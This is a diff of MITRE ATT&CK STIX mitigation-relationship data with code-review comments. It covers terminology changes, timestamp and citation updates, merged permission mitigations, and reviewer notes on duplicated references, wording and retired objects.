"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--25fc21a1-4965-4c18-9415-215390eab16c",
"type": "relationship",
- "modified": "2020-03-26T21:00:39.569Z",
+ "modified": "2020-06-20T22:28:08.872Z",
"created": "2020-02-21T20:46:51.944Z"
},
{
@@ -163612,10 +164955,10 @@
"source_ref": "course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3",
"target_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59",
"relationship_type": "mitigates",
- "description": "Make sure that the HISTCONTROL environment variable is set to \u201cignoredup\u201d instead of \u201cignoreboth\u201d or \u201cignorespace\u201d.",
+ "description": "Make sure that the HISTCONTROL environment variable is set to \u201cignoredups\u201d instead of \u201cignoreboth\u201d or \u201cignorespace\u201d.",
"id": "relationship--35928199-0073-4000-b2f8-726ab2d41a06",
"type": "relationship",
- "modified": "2020-03-29T22:09:18.184Z",
+ "modified": "2020-06-19T16:50:46.018Z",
"created": "2020-02-21T20:56:06.721Z"
},
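Review bot: `ignoredups` is the correct bash spelling, but the mitigation still reads as if setting the variable were an enforced control; HISTCONTROL is a per-session environment variable that the user (or an attacker with a shell) can simply override or `unset`, so on its own it does not stop history evasion. I would add that caveat to the description, e.g. `Make sure that the HISTCONTROL environment variable is set to “ignoredups” instead of “ignoreboth” or “ignorespace”; users can override this in their own session, so pair it with process/command auditing rather than relying on shell history alone.` It is also worth noting, hedged, that `ignoreboth` appears to be the value shipped in several distributions' default profiles, which is what an administrator would need to change.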
{
@@ -163876,7 +165219,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--5611881f-a9a3-4527-99a6-e717630703bb",
"type": "relationship",
- "modified": "2020-02-21T22:40:58.262Z",
+ "modified": "2020-06-20T22:21:32.628Z",
"created": "2020-02-21T21:35:25.887Z"
},
{
@@ -163890,7 +165233,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--1016e15c-64ed-4338-9ca9-83ffae3beb82",
"type": "relationship",
- "modified": "2020-03-23T13:20:56.030Z",
+ "modified": "2020-06-20T22:17:05.561Z",
"created": "2020-02-21T21:42:07.090Z"
},
{
@@ -163904,7 +165247,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--ee720f16-feda-4146-891e-fb814f912280",
"type": "relationship",
- "modified": "2020-02-21T22:41:25.311Z",
+ "modified": "2020-06-20T22:23:35.908Z",
"created": "2020-02-21T21:46:05.325Z"
},
{
@@ -163918,7 +165261,7 @@
"description": "Utilize Yama (ex: /proc/sys/kernel/yama/ptrace_scope) to mitigate ptrace based process injection by restricting the use of ptrace to privileged users only. Other mitigation controls involve the deployment of security kernel modules that provide advanced access control and process restrictions such as SELinux, grsecurity, and AppArmor. ",
"id": "relationship--c7676864-765f-4c08-951e-fb14f35f16c1",
"type": "relationship",
- "modified": "2020-03-26T20:27:57.416Z",
+ "modified": "2020-06-20T22:24:56.934Z",
"created": "2020-02-21T22:07:25.435Z"
},
{
@@ -163932,7 +165275,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--b33fd646-b98b-4ea0-8ae3-5cf0367140f6",
"type": "relationship",
- "modified": "2020-03-26T20:27:57.419Z",
+ "modified": "2020-06-20T22:24:56.936Z",
"created": "2020-02-21T22:07:25.444Z"
},
{
@@ -163946,7 +165289,7 @@
"description": "Restrict the permissions on sensitive files such as /proc/[pid]/maps or /proc/[pid]/mem. ",
"id": "relationship--49d40f3b-33b4-424c-a645-82d2a84e5c28",
"type": "relationship",
- "modified": "2020-03-26T20:33:52.704Z",
+ "modified": "2020-06-20T22:25:55.462Z",
"created": "2020-02-21T22:16:10.099Z"
},
{
@@ -163960,7 +165303,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--1f4fe996-b32f-4cc5-b5d6-dc10a9bebeeb",
"type": "relationship",
- "modified": "2020-03-26T20:33:52.713Z",
+ "modified": "2020-06-20T22:25:55.465Z",
"created": "2020-02-21T22:16:10.110Z"
},
{
@@ -163974,7 +165317,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--8dfddd1a-dd5f-461f-86ce-ba1fd557a397",
"type": "relationship",
- "modified": "2020-03-26T20:38:26.483Z",
+ "modified": "2020-06-20T22:26:33.386Z",
"created": "2020-02-21T22:21:10.156Z"
},
{
@@ -163988,7 +165331,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--505e8568-1870-4aca-81ff-7c222eb4db37",
"type": "relationship",
- "modified": "2020-03-26T21:05:43.097Z",
+ "modified": "2020-06-20T22:27:21.422Z",
"created": "2020-02-21T22:25:12.496Z"
},
{
@@ -164033,7 +165376,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-31T13:54:08.493Z",
+ "modified": "2020-06-01T13:16:33.246Z",
"created": "2020-02-25T17:17:48.379Z"
},
{
@@ -164247,7 +165590,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-23T23:24:39.529Z",
+ "modified": "2020-05-20T13:33:51.038Z",
"created": "2020-02-25T19:19:09.960Z"
},
{
@@ -165079,6 +166422,16 @@
"description": "When flood volumes exceed the capacity of the network connection being targeted, it is typically necessary to intercept the incoming traffic upstream to filter out the attack traffic from the legitimate traffic. Such defenses can be provided by the hosting Internet Service Provider (ISP) or by a 3rd party such as a Content Delivery Network (CDN) or providers specializing in DoS mitigations.(Citation: CERT-EU DDoS March 2017)\n\nDepending on flood volume, on-premises filtering may be possible by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.(Citation: CERT-EU DDoS March 2017)\n\nAs immediate response may require rapid engagement of 3rd parties, analyze the risk associated to critical resources being affected by Network DoS attacks and create a disaster recovery plan/business continuity plan to respond to incidents.(Citation: CERT-EU DDoS March 2017)",
"id": "relationship--92f524c5-86e8-43cf-90d5-907ac16acf5d",
"external_references": [
+ {
+ "source_name": "CERT-EU DDoS March 2017",
+ "url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf",
+ "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019."
+ },
+ {
+ "source_name": "CERT-EU DDoS March 2017",
+ "url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf",
+ "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019."
+ },
{
"source_name": "CERT-EU DDoS March 2017",
"url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf",
@@ -165086,7 +166439,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-29T01:10:52.515Z",
+ "modified": "2020-06-01T13:16:33.127Z",
"created": "2020-03-02T20:36:52.656Z"
},
{
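Review bot: The two added `external_references` objects are byte-for-byte copies of the entry that already follows them, so relationship--92f524c5 now carries the same CERT-EU citation three times. The description cites `(Citation: CERT-EU DDoS March 2017)` three times, which looks like the generator emitted one reference object per citation occurrence; `external_references` is meant to list distinct sources and ATT&CK citations resolve by `source_name`, so the duplicates add nothing and inflate every consumer's reference index. Drop the two added objects and keep the single existing entry. Separately, the reference URL is plain `http://`; if cert.europa.eu serves the whitepaper over HTTPS the stored URL should use it.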
@@ -165100,6 +166453,16 @@
"description": "When flood volumes exceed the capacity of the network connection being targeted, it is typically necessary to intercept the incoming traffic upstream to filter out the attack traffic from the legitimate traffic. Such defenses can be provided by the hosting Internet Service Provider (ISP) or by a 3rd party such as a Content Delivery Network (CDN) or providers specializing in DoS mitigations.(Citation: CERT-EU DDoS March 2017)\n\nDepending on flood volume, on-premises filtering may be possible by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.(Citation: CERT-EU DDoS March 2017)\n\nAs immediate response may require rapid engagement of 3rd parties, analyze the risk associated to critical resources being affected by Network DoS attacks and create a disaster recovery plan/business continuity plan to respond to incidents.(Citation: CERT-EU DDoS March 2017)",
"id": "relationship--2f47b6cb-a378-492d-9565-e9ebbca68908",
"external_references": [
+ {
+ "source_name": "CERT-EU DDoS March 2017",
+ "url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf",
+ "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019."
+ },
+ {
+ "source_name": "CERT-EU DDoS March 2017",
+ "url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf",
+ "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019."
+ },
{
"source_name": "CERT-EU DDoS March 2017",
"url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf",
@@ -165107,7 +166470,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-23T12:55:30.265Z",
+ "modified": "2020-06-01T13:16:33.146Z",
"created": "2020-03-02T21:04:24.530Z"
},
{
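Review bot: Same duplication as the sibling DoS relationship above: the two added `external_references` objects for relationship--2f47b6cb are identical to the entry that already follows them, leaving three copies of the one CERT-EU source. Since citations resolve by `source_name`, one entry is sufficient; remove the two added objects. If this was produced by a tool that emits one reference per `(Citation: …)` occurrence, the deduplication belongs in that tool so the problem does not recur on the next regeneration.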
@@ -165509,7 +166872,7 @@
"description": "Where possible, only permit execution of signed scripts.",
"id": "relationship--2cf7243f-d5d7-473b-9cb7-27c7186565d3",
"type": "relationship",
- "modified": "2020-03-28T16:19:45.892Z",
+ "modified": "2020-06-25T03:19:34.259Z",
"created": "2020-03-09T13:41:14.474Z"
},
{
@@ -165530,7 +166893,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-28T16:19:45.932Z",
+ "modified": "2020-06-25T03:19:34.303Z",
"created": "2020-03-09T13:41:14.487Z"
},
{
@@ -165544,7 +166907,7 @@
"description": "Disable or remove any unnecessary or unused shells or interpreters.",
"id": "relationship--6abc6901-d152-4b5f-b27d-8b973ae567cb",
"type": "relationship",
- "modified": "2020-03-28T16:19:45.936Z",
+ "modified": "2020-06-25T03:19:34.300Z",
"created": "2020-03-09T13:41:14.499Z"
},
{
@@ -165558,7 +166921,7 @@
"description": "Set PowerShell execution policy to execute only signed scripts.",
"id": "relationship--8fc79376-2f71-4ca1-8177-a96dea11f8c7",
"type": "relationship",
- "modified": "2020-03-28T16:26:31.111Z",
+ "modified": "2020-06-24T13:51:22.595Z",
"created": "2020-03-09T13:48:55.768Z"
},
{
@@ -165579,7 +166942,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-28T16:26:31.140Z",
+ "modified": "2020-06-24T13:51:22.627Z",
"created": "2020-03-09T13:48:55.799Z"
},
{
@@ -165593,7 +166956,7 @@
"description": "It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions.\n\nDisable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.",
"id": "relationship--5a580cd0-19f1-41d6-865b-786a41081a7e",
"type": "relationship",
- "modified": "2020-03-28T16:26:31.137Z",
+ "modified": "2020-06-24T13:51:22.624Z",
"created": "2020-03-09T13:48:55.802Z"
},
{
@@ -165630,10 +166993,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--37b11151-1776-4f8f-b328-30939fbf2ceb",
"relationship_type": "mitigates",
- "description": "Use application whitelisting where appropriate.",
+ "description": "Use application control where appropriate.",
"id": "relationship--809f6537-c7f8-4d96-ba16-5bffa897b52f",
"type": "relationship",
- "modified": "2020-03-28T16:44:34.721Z",
+ "modified": "2020-06-20T20:11:42.524Z",
"created": "2020-03-09T14:07:54.876Z"
},
{
@@ -165654,7 +167017,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-28T16:44:34.723Z",
+ "modified": "2020-04-14T13:28:17.854Z",
"created": "2020-03-09T14:07:54.886Z"
},
{
@@ -165691,10 +167054,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"relationship_type": "mitigates",
- "description": "Use application whitelisting where appropriate.",
+ "description": "Use application control where appropriate.",
"id": "relationship--aa103bc8-1753-4b41-bf5c-a9dc0b9a2986",
"type": "relationship",
- "modified": "2020-03-28T17:02:13.822Z",
+ "modified": "2020-06-20T20:11:42.865Z",
"created": "2020-03-09T14:12:31.537Z"
},
{
@@ -165718,10 +167081,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
"relationship_type": "mitigates",
- "description": "Use application whitelisting where appropriate.",
+ "description": "Use application control where appropriate.",
"id": "relationship--6f5aaa40-a294-4b8f-8bd3-0f34ce8a0612",
"type": "relationship",
- "modified": "2020-03-28T17:06:19.793Z",
+ "modified": "2020-06-20T20:11:42.897Z",
"created": "2020-03-09T14:15:05.744Z"
},
{
@@ -165745,10 +167108,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"relationship_type": "mitigates",
- "description": "Use application whitelisting where appropriate.",
+ "description": "Use application control where appropriate.",
"id": "relationship--1a69dce6-b39e-4cd2-a29a-18e42293c51a",
"type": "relationship",
- "modified": "2020-03-28T17:34:02.841Z",
+ "modified": "2020-06-25T03:32:51.271Z",
"created": "2020-03-09T14:29:52.125Z"
},
{
@@ -165759,10 +167122,10 @@
"source_ref": "course-of-action--eb88d97c-32f1-40be-80f0-d61a4b0b4b31",
"target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"relationship_type": "mitigates",
- "description": "Turn off or restrict access to VBScript.",
+ "description": "Turn off or restrict access to unneeded VB components.",
"id": "relationship--0f27ea83-21e7-4a9f-9c66-85fe85da5135",
"type": "relationship",
- "modified": "2020-03-28T17:34:02.843Z",
+ "modified": "2020-06-25T03:32:51.262Z",
"created": "2020-03-09T14:29:52.132Z"
},
{
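Review bot: The new wording `Turn off or restrict access to unneeded VB components.` is vaguer than the `VBScript` text it replaces, and a defender reading this mitigation cannot tell which components it means. Presumably the broadening is because the target technique covers more than VBScript (VBA and VB.NET are the usual companions), so name the examples instead of dropping them, e.g. `Turn off or restrict access to unneeded VB components (e.g., the VBScript engine, Office VBA macros).` That keeps the mitigation actionable without narrowing it back to a single engine.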
@@ -165789,7 +167152,7 @@
"description": "Prevent users from installing Python where not required.",
"id": "relationship--9e0a19f8-e970-49a1-9952-ae7380247ace",
"type": "relationship",
- "modified": "2020-03-28T17:44:07.886Z",
+ "modified": "2020-06-23T19:03:15.357Z",
"created": "2020-03-09T14:38:24.604Z"
},
{
@@ -165800,10 +167163,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
"relationship_type": "mitigates",
- "description": "Blacklist Python where not required.",
+ "description": "Denylist Python where not required.",
"id": "relationship--b7f73589-4640-468d-8422-04cfc7e7e110",
"type": "relationship",
- "modified": "2020-03-28T17:44:07.889Z",
+ "modified": "2020-06-23T19:03:15.359Z",
"created": "2020-03-09T14:38:24.610Z"
},
{
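Review bot: `Denylist Python where not required.` is the only description under this `source_ref` in the diff that recommends a deny list; the sibling entries for the same course-of-action read `Use application control where appropriate.` Denylisting an interpreter by file name or path is easy to sidestep (renamed binary, a portable or embedded interpreter, invocation through another host), so the wording undercuts the allow-list model the neighbouring entries describe. Consider `Use application control to block Python interpreters where they are not required.` so the guidance is consistent and does not suggest a bypassable control.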
@@ -165817,7 +167180,7 @@
"description": "Inventory systems for unauthorized Python installations.",
"id": "relationship--03b2c5b8-aeca-4232-a206-521b83d56c54",
"type": "relationship",
- "modified": "2020-03-28T17:44:07.916Z",
+ "modified": "2020-06-23T19:03:15.369Z",
"created": "2020-03-09T14:38:24.627Z"
},
{
@@ -166098,7 +167461,7 @@
"description": "Prevent users from installing their own launch agents or launch daemons.",
"id": "relationship--e2bf1135-6715-446a-aff7-96d5a0a20477",
"type": "relationship",
- "modified": "2020-03-28T18:28:34.736Z",
+ "modified": "2020-06-08T23:28:29.240Z",
"created": "2020-03-10T18:26:56.467Z"
},
{
@@ -166244,7 +167607,7 @@
"description": "A patch management process should be implemented to check unused dependencies, unmaintained and/or previously vulnerable dependencies, unnecessary features, components, files, and documentation.",
"id": "relationship--8767be49-dbb2-493f-82b7-cc0053f02c8e",
"type": "relationship",
- "modified": "2020-03-11T14:13:43.009Z",
+ "modified": "2020-07-07T12:42:39.292Z",
"created": "2020-03-11T14:13:43.009Z"
},
{
@@ -166255,10 +167618,17 @@
"source_ref": "course-of-action--15437c6d-b998-4a36-be41-4ace3d54d266",
"target_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720",
"relationship_type": "mitigates",
- "description": "Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well.",
+ "description": "Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well.(Citation: OWASP Top 10)",
"id": "relationship--4d76c9e2-bef1-4b2c-8199-a9a454cf1168",
+ "external_references": [
+ {
+ "url": "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project",
+ "description": "OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.",
+ "source_name": "OWASP Top 10"
+ }
+ ],
"type": "relationship",
- "modified": "2020-03-31T13:11:42.307Z",
+ "modified": "2020-07-14T22:22:06.474Z",
"created": "2020-03-11T14:13:43.029Z"
},
{
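Review bot: The sentence kept on the new side, `...should also be implemented as well.`, is redundant (`also` and `as well`) and was carried over unchanged while only the citation was appended; suggest `Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented.(Citation: OWASP Top 10)`. The added reference points at the legacy `owasp.org/index.php` wiki path with a 2018 retrieval date on a 2020 edit; that path may well redirect or no longer resolve, so it is worth re-verifying the URL before committing the citation.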
@@ -166285,7 +167655,7 @@
"description": "A patch management process should be implemented to check unused applications, unmaintained and/or previously vulnerable software, unnecessary features, components, files, and documentation.",
"id": "relationship--e177cd6d-a6ca-4062-9dfe-e238e22c51a7",
"type": "relationship",
- "modified": "2020-03-11T14:17:21.278Z",
+ "modified": "2020-07-07T12:42:39.279Z",
"created": "2020-03-11T14:17:21.278Z"
},
{
@@ -166296,10 +167666,17 @@
"source_ref": "course-of-action--15437c6d-b998-4a36-be41-4ace3d54d266",
"target_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00",
"relationship_type": "mitigates",
- "description": "Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well.",
+ "description": "Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well.(Citation: OWASP Top 10)",
"id": "relationship--f57f7e65-0017-45a2-9abd-db439a64ad45",
+ "external_references": [
+ {
+ "url": "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project",
+ "description": "OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.",
+ "source_name": "OWASP Top 10"
+ }
+ ],
"type": "relationship",
- "modified": "2020-03-31T13:11:42.312Z",
+ "modified": "2020-07-14T22:22:06.510Z",
"created": "2020-03-11T14:17:21.292Z"
},
{
@@ -166332,13 +167709,13 @@
"source_name": "TCG Trusted Platform Module"
},
{
- "url": "https://technet.microsoft.com/en-us/windows/dn168167.aspx",
- "description": "Microsoft. (n.d.). Secure the Windows 8.1 boot process. Retrieved June 11, 2016.",
+ "url": "https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process",
+ "description": "Microsoft. (n.d.). Secure the Windows 10 boot process. Retrieved April 23, 2020.",
"source_name": "TechNet Secure Boot Process"
}
],
"type": "relationship",
- "modified": "2020-03-23T12:51:45.557Z",
+ "modified": "2020-04-23T19:10:28.416Z",
"created": "2020-03-11T14:28:40.154Z"
},
{
@@ -166417,10 +167794,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
"relationship_type": "mitigates",
- "description": "Application whitelisting may be able to prevent the running of executables masquerading as other files.",
+ "description": "Application control may be able to prevent the running of executables masquerading as other files.",
"id": "relationship--60e4698b-a16d-4a40-8473-4d88e2e70881",
"type": "relationship",
- "modified": "2020-03-11T14:55:56.283Z",
+ "modified": "2020-06-20T20:11:42.901Z",
"created": "2020-03-11T14:49:37.065Z"
},
{
@@ -167006,7 +168383,7 @@
"id": "relationship--469231fb-3797-49bf-9f23-078b37a35671",
"description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation. ",
"type": "relationship",
- "modified": "2020-03-26T19:43:34.145Z",
+ "modified": "2020-06-20T22:01:10.078Z",
"created": "2020-03-13T11:42:14.585Z"
},
{
@@ -167022,20 +168399,6 @@
"modified": "2020-03-13T11:42:14.588Z",
"created": "2020-03-13T11:42:14.588Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
- "target_ref": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b",
- "relationship_type": "mitigates",
- "id": "relationship--668edec4-0bf0-4130-aa3b-a884b41fd310",
- "description": "Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution.",
- "type": "relationship",
- "modified": "2020-03-26T19:55:40.119Z",
- "created": "2020-03-13T13:51:58.665Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -167045,9 +168408,9 @@
"target_ref": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b",
"relationship_type": "mitigates",
"id": "relationship--ca04cce0-2f47-4c73-956f-808573b62903",
- "description": "Require that all executables be placed in write-protected directories.",
+ "description": "Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution. Require that all executables be placed in write-protected directories.",
"type": "relationship",
- "modified": "2020-03-26T19:55:40.132Z",
+ "modified": "2020-05-20T15:12:39.573Z",
"created": "2020-03-13T13:51:58.682Z"
},
{
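Review bot: The merged description is fine, but the text it absorbs comes from `relationship--668edec4-0bf0-4130-aa3b-a884b41fd310`, which the preceding hunk deletes from the bundle outright rather than marking it retired. As far as I know ATT&CK's STIX data signals withdrawn objects with `"revoked": true` (or `x_mitre_deprecated`) so that consumers who already ingested the id can reconcile it; silently dropping it leaves them holding a relationship that no longer exists upstream. Consider keeping the old object with `"revoked": true` and a fresh `modified` timestamp instead of removing it. The same applies to the analogous merges later in this diff for target techniques `0c2d00da-...` and `58af3705-...`.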
@@ -167122,9 +168485,9 @@
"description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016."
}
],
- "description": "Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application whitelisting tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate.(Citation: SANS Application Whitelisting)(Citation: Microsoft Windows Defender Application Control)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)(Citation: Microsoft Application Lockdown)(Citation: Microsoft Using Software Restriction )",
+ "description": "Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application control tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate.(Citation: SANS Application Whitelisting)(Citation: Microsoft Windows Defender Application Control)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)(Citation: Microsoft Application Lockdown)(Citation: Microsoft Using Software Restriction )",
"type": "relationship",
- "modified": "2020-03-26T19:55:40.164Z",
+ "modified": "2020-06-20T20:11:42.903Z",
"created": "2020-03-13T13:51:58.701Z"
},
{
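Review bot: The new description still reads `block potentially malicious software executed path interception`, which is missing a preposition; the search-order-hijacking sibling in this diff says `executed through search order hijacking`, so this should be `Identify and block potentially malicious software executed through path interception by using application control tools, ...`. The change only swapped `whitelisting` for `control` and left the grammar in place, and the same sentence recurs in the two later hunks for target techniques `0c2d00da-...` and `58af3705-...`. The `source_name` `SANS Application Whitelisting` is a citation key and is correctly left untouched; note the retained key `Microsoft Using Software Restriction ` carries a trailing space that must match its reference entry exactly.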
@@ -167140,20 +168503,6 @@
"modified": "2020-03-13T13:51:58.704Z",
"created": "2020-03-13T13:51:58.704Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
- "target_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32",
- "relationship_type": "mitigates",
- "id": "relationship--0f9bf2ed-2ab3-4783-bdac-07498c457bcd",
- "description": "Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution.",
- "type": "relationship",
- "modified": "2020-03-26T19:59:42.593Z",
- "created": "2020-03-13T14:10:43.546Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -167163,9 +168512,9 @@
"target_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32",
"relationship_type": "mitigates",
"id": "relationship--5a70a968-618c-489e-8087-eabca740aa3a",
- "description": "Require that all executables be placed in write-protected directories.",
+ "description": "Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution. Require that all executables be placed in write-protected directories.",
"type": "relationship",
- "modified": "2020-03-26T19:59:42.604Z",
+ "modified": "2020-06-20T22:02:41.210Z",
"created": "2020-03-13T14:10:43.564Z"
},
{
@@ -167209,9 +168558,9 @@
"description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016."
}
],
- "description": "Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application whitelisting tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate.(Citation: SANS Application Whitelisting)(Citation: Microsoft Windows Defender Application Control)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)(Citation: Microsoft Application Lockdown)(Citation: Microsoft Using Software Restriction )",
+ "description": "Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application control tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate.(Citation: SANS Application Whitelisting)(Citation: Microsoft Windows Defender Application Control)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)(Citation: Microsoft Application Lockdown)(Citation: Microsoft Using Software Restriction )",
"type": "relationship",
- "modified": "2020-03-26T19:59:42.624Z",
+ "modified": "2020-06-20T22:02:41.224Z",
"created": "2020-03-13T14:10:43.585Z"
},
{
@@ -167242,7 +168591,7 @@
],
"description": "Find and eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them. Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate.\n\nClean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries. Periodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations.(Citation: Microsoft CreateProcess)(Citation: Microsoft Dynamic-Link Library Security)(Citation: Vulnerability and Exploit Detector)",
"type": "relationship",
- "modified": "2020-03-26T19:59:42.628Z",
+ "modified": "2020-06-20T22:02:41.227Z",
"created": "2020-03-13T14:10:43.598Z"
},
{
@@ -167258,20 +168607,6 @@
"modified": "2020-03-13T14:10:43.600Z",
"created": "2020-03-13T14:10:43.600Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
- "target_ref": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2",
- "relationship_type": "mitigates",
- "id": "relationship--6760d1c5-ea72-43af-aadc-4f60f6bcf6c7",
- "description": "Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution.",
- "type": "relationship",
- "modified": "2020-03-26T20:03:27.681Z",
- "created": "2020-03-13T17:48:59.191Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -167281,9 +168616,9 @@
